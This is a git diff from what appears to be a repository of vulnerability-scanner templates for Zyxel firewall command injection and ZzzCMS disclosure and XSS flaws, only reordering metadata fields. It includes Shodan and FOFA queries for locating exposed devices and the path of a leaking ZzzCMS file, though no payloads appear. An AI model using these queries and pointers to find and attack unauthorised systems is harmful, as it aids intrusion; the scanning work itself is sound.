4a0a004730450221009b3af7535c942d939a7463c5c3332c3d96b8b6c37337c0b3c19f2e328ccb7a51022031b67302f23c6c4dbc39c125ff2e43c087440dd55f91bb9a68636fe1ca3a54b3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009b3af7535c942d939a7463c5c3332c3d96b8b6c37337c0b3c19f2e328ccb7a51022031b67302f23c6c4dbc39c125ff2e43c087440dd55f91bb9a68636fe1ca3a54b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/zyxel/unauth-ztp-ping.yaml b/http/vulnerabilities/zyxel/unauth-ztp-ping.yaml index d70daf904c..3acfd2518d 100644 --- a/http/vulnerabilities/zyxel/unauth-ztp-ping.yaml +++ b/http/vulnerabilities/zyxel/unauth-ztp-ping.yaml @@ -10,16 +10,16 @@ info: reference: - https://www.fullspectrum.dev/the-hunt-for-cve-2023-28771-friends-part-2-fingerprinting-handler/ - https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-remote-command-injection-vulnerability-of-firewalls + classification: + cpe: cpe:2.3:o:zyxel:usg1000_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"USG FLEX" - product: usg1000_firmware vendor: zyxel + product: usg1000_firmware + shodan-query: title:"USG FLEX" tags: misconfig,unauth,zyxel,ztp,rce,oast - classification: - cpe: cpe:2.3:o:zyxel:usg1000_firmware:*:*:*:*:*:*:*:* http: - raw: - | @@ -47,4 +47,4 @@ http: status: - 200 -# digest: 4a0a0047304502210088ebd31c0c2e0991760e848c1cd717d31e59b52d1eba75b22cfb9561c9e8b44302203bb21fde8ace66f8440da2c84ca7a69c84cd5a96882b50d3d064e3b93b5432de:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210088ebd31c0c2e0991760e848c1cd717d31e59b52d1eba75b22cfb9561c9e8b44302203bb21fde8ace66f8440da2c84ca7a69c84cd5a96882b50d3d064e3b93b5432de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml b/http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml index 5a1a4c63b8..053902e85f 100644 --- a/http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml +++ b/http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml @@ -8,17 +8,17 @@ info: There is a rather strange file that directly echoes some content belonging to the inaccessible zzz_config.php. The information leakage file is located in plugins\webuploader\js\webconfig.php, and the management path name of the management background can be obtained directly. No need to blast admin and add 3 digits anymore reference: - https://xz.aliyun.com/t/7414 + classification: + cpe: cpe:2.3:a:zzzcms:zzzcms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: zzzcms + product: zzzcms shodan-query: html:"ZzzCMS" fofa-query: title="ZzzCMS" - product: zzzcms - vendor: zzzcms tags: zzzcms,info,disclosure - classification: - cpe: cpe:2.3:a:zzzcms:zzzcms:*:*:*:*:*:*:*:* http: - raw: - | @@ -43,4 +43,4 @@ http: status: - 200 -# digest: 4a0a0047304502202a3a4916c5fadccff982078fec5a98de45b89076f013e080cad56b7f25fd7327022100bc6f7789895c6bb952913f2990bb4214961e49148417b7b16e969c14585ea09d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202a3a4916c5fadccff982078fec5a98de45b89076f013e080cad56b7f25fd7327022100bc6f7789895c6bb952913f2990bb4214961e49148417b7b16e969c14585ea09d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/zzzcms/zzzcms-xss.yaml b/http/vulnerabilities/zzzcms/zzzcms-xss.yaml index 5231cfe166..967ac9eb9b 100644 --- a/http/vulnerabilities/zzzcms/zzzcms-xss.yaml +++ b/http/vulnerabilities/zzzcms/zzzcms-xss.yaml @@ -7,6 +7,8 @@ info: description: ZzzCMS ( A Lightweight ASP.NET content management system ) is vulnerable to XSS( Cross-Site Scripting ). reference: - https://github.com/Ares-X/VulWiki/blob/master/Web%E5%AE%89%E5%85%A8/Zzzcms/Zzzcms%201.75%20xss%E6%BC%8F%E6%B4%9E.md + classification: + cpe: cpe:2.3:a:zzzcms:zzzcms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 @@ -16,8 +18,6 @@ info: vendor: zzzcms tags: zzzcms,xss - classification: - cpe: cpe:2.3:a:zzzcms:zzzcms:*:*:*:*:*:*:*:* http: - raw: - |